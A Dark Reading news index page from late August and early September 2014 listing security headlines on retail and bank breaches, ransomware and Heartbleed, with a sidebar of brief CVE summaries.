Attacks/Breaches
News & Commentary
Home Depot The Latest Hack Victim?
Kelly Jackson Higgins, Executive Editor at Dark ReadingQuick Hits
Home improvement chain--along with law enforcement and banks--are investigating 'unusual activity.'
By Kelly Jackson Higgins Executive Editor at Dark Reading, 9/2/2014
Comment0 comments  |  Read  |  Post a Comment
How To Create A Risk 'Pain Chart'
Brian Prince, Contributing Writer, Dark ReadingNews
Consultant John Pironti outlines how to execute a risk-based approach to defending corporate assets.
By Brian Prince Contributing Writer, Dark Reading, 8/29/2014
Comment5 comments  |  Read  |  Post a Comment
Why Are Security Pros Blasé About Compliance?
François Amigorena, Founder & CEO, IS DecisionsCommentary
A survey of 500 IT and security decision makers in the UK and US shows that a majority are in the dark about regulatory requirements for their business organization.
By François Amigorena Founder & CEO, IS Decisions, 8/29/2014
Comment17 comments  |  Read  |  Post a Comment
CryptoWall More Pervasive, Less Profitable Than CryptoLocker
Sara Peters, Senior Editor at Dark ReadingNews
The former CryptoLocker wannabe has netted 625,000 infected systems and more than $1 million in ransoms.
By Sara Peters Senior Editor at Dark Reading, 8/28/2014
Comment5 comments  |  Read  |  Post a Comment
Feds Investigating Breaches At JPMorgan, Other Banks
Kelly Jackson Higgins, Executive Editor at Dark ReadingNews
JPMorgan working with FBI, US Secret Service to determine scope of breach, but other newly reported intrusions at financial firms may not be related.
By Kelly Jackson Higgins Executive Editor at Dark Reading, 8/28/2014
Comment8 comments  |  Read  |  Post a Comment
Backoff, Dairy Queen, UPS & Retail's Growing PoS Security Problem
Sara Peters, Senior Editor at Dark ReadingNews
Retail brands are trying to pass the buck for data security to banks and franchisees, say some experts.
By Sara Peters Senior Editor at Dark Reading, 8/27/2014
Comment9 comments  |  Read  |  Post a Comment
Sony, XBox Victims Of DDoS, Hacktivist Threats
Sara Peters, Senior Editor at Dark ReadingQuick Hits
Hacktivists from Anonymous and from a presumed Islamic extremist group targeted a variety of online gaming services.
By Sara Peters Senior Editor at Dark Reading, 8/26/2014
Comment6 comments  |  Read  |  Post a Comment
Top 5 Reasons Your Small Business Website is Under Attack
Chris Weltzien, CEO, 6Scan Commentary
There is no such thing as “too small to hack.” If a business has a website, hackers can exploit it.
By Chris Weltzien CEO, 6Scan , 8/26/2014
Comment28 comments  |  Read  |  Post a Comment
10 Ways To Strengthen Healthcare Security
Alison Diana, Senior Editor
As recent hacks show, keeping a healthcare organization safe from security threats takes planning, technical expertise, and business knowledge. Has your team taken these 10 steps?
By Alison Diana Senior Editor, 8/26/2014
Comment13 comments  |  Read  |  Post a Comment
Breach of Homeland Security Background Checks Raises Red Flags
Sara Peters, Senior Editor at Dark ReadingNews
"We should be burning down the house over this," says a GRC expert.
By Sara Peters Senior Editor at Dark Reading, 8/25/2014
Comment13 comments  |  Read  |  Post a Comment
All In For The Coming World of 'Things'
Don Bailey, Founder & CEO, Lab Mouse SecurityCommentary
At a Black Hat round table, experts discuss the strategies necessary to lock down the Internet of Things, the most game-changing concept in Internet history.
By Don Bailey Founder & CEO, Lab Mouse Security, 8/25/2014
Comment6 comments  |  Read  |  Post a Comment
Healthcare Industry, Feds Talk Information Sharing
Brian Prince, Contributing Writer, Dark ReadingNews
Representatives from the healthcare industry as well as government discuss importance of threat intelligence-sharing in light of the Community Health Systems breach.
By Brian Prince Contributing Writer, Dark Reading, 8/22/2014
Comment0 comments  |  Read  |  Post a Comment
Flash Poll: CSOs Need A New Boss
Marilyn Cohodas, Community Editor, Dark ReadingCommentary
Only one out of four respondents to our flash poll think the CSO should report to the CIO.
By Marilyn Cohodas Community Editor, Dark Reading, 8/22/2014
Comment4 comments  |  Read  |  Post a Comment
Hacker Or Military? Best Of Both In Cyber Security
John B. Dickson, CISSP,  Principal, Denim GroupCommentary
How radically different approaches play out across the security industry.
By John B. Dickson CISSP, Principal, Denim Group, 8/21/2014
Comment6 comments  |  Read  |  Post a Comment
51 UPS Stores' Point-of-Sale Systems Breached
Sara Peters, Senior Editor at Dark ReadingNews
Customers will not receive individual breach notifications.
By Sara Peters Senior Editor at Dark Reading, 8/21/2014
Comment7 comments  |  Read  |  Post a Comment
Heartbleed Not Only Reason For Health Systems Breach
Sara Peters, Senior Editor at Dark ReadingNews
Community Health Systems' bad patching practices are nothing compared to its poor encryption, network monitoring, fraud detection, and data segmentation, experts say.
By Sara Peters Senior Editor at Dark Reading, 8/20/2014
Comment14 comments  |  Read  |  Post a Comment
Debugging The Myths Of Heartbleed
Steve Riley, Technical Leader, Office of the CTO, Riverbed TechnologyCommentary
Does Heartbleed really wreak havoc without a trace? The media and many technical sites seemed convinced of this, but some of us were skeptical.
By Steve Riley Technical Leader, Office of the CTO, Riverbed Technology, 8/20/2014
Comment5 comments  |  Read  |  Post a Comment
Nuclear Regulatory Commission Compromised 3 Times In Past 3 Years
Sara Peters, Senior Editor at Dark ReadingQuick Hits
Unnamed actors try to swipe privileged credentials.
By Sara Peters Senior Editor at Dark Reading, 8/19/2014
Comment5 comments  |  Read  |  Post a Comment
Why John McAfee Is Paranoid About Mobile
Peter Zavlaris, Analyst, RiskIQCommentary
Mobile apps are posing expanding risks to both enterprises and their customers. But maybe being paranoid about mobile is actually healthy for security.
By Peter Zavlaris Analyst, RiskIQ, 8/19/2014
Comment11 comments  |  Read  |  Post a Comment
Community Health Systems Breach Atypical For Chinese Hackers
Sara Peters, Senior Editor at Dark ReadingNews
Publicly traded healthcare organization's stock goes up as breach notifications go out.
By Sara Peters Senior Editor at Dark Reading, 8/18/2014
Comment8 comments  |  Read  |  Post a Comment
More Stories
Current Conversations
More Conversations
Security Insights
3 Places to Enable 2-Factor Authentication Now
3 Places to Enable 2-Factor Authentication Now
Two-factor authentication is a ubiquitous, mature technology. Whether or not you use it for your network, here are three external services for which you should immediately enable it.
Comment1 comments
Read | Post a Comment
More Sophos Security Insights
PR Newswire
Register for Dark Reading Newsletters
White Papers
Cartoon
Current Issue
Flash Poll
Video
Slideshows
Twitter Feed
Dark Reading - Bug Report
Bug Report
Enterprise Vulnerabilities
From DHS/US-CERT's National Vulnerability Database
CVE-2014-0485
Published: 2014-09-02
S3QL 1.18.1 and earlier uses the pickle Python module unsafely, which allows remote attackers to execute arbitrary code via a crafted serialized object in (1) common.py or (2) local.py in backends/.

CVE-2014-3861
Published: 2014-09-02
Cross-site scripting (XSS) vulnerability in CDA.xsl in HL7 C-CDA 1.1 and earlier allows remote attackers to inject arbitrary web script or HTML via a crafted reference element within a nonXMLBody element.

CVE-2014-3862
Published: 2014-09-02
CDA.xsl in HL7 C-CDA 1.1 and earlier allows remote attackers to discover potentially sensitive URLs via a crafted reference element that triggers creation of an IMG element with an arbitrary URL in its SRC attribute, leading to information disclosure in a Referer log.

CVE-2014-5076
Published: 2014-09-02
The La Banque Postale application before 3.2.6 for Android does not prevent the launching of an activity by a component of another application, which allows attackers to obtain sensitive cached banking information via crafted intents, as demonstrated by the drozer framework.

CVE-2014-5136
Published: 2014-09-02
Cross-site scripting (XSS) vulnerability in Innovative Interfaces Sierra Library Services Platform 1.2_3 allows remote attackers to inject arbitrary web script or HTML via unspecified parameters.

Best of the Web
Dark Reading Radio
Archived Dark Reading Radio
This episode of Dark Reading Radio looks at infosec security from the big enterprise POV with interviews featuring Ron Plesco, Cyber Investigations, Intelligence & Analytics at KPMG; and Chris Inglis & Chris Bell of Securonix.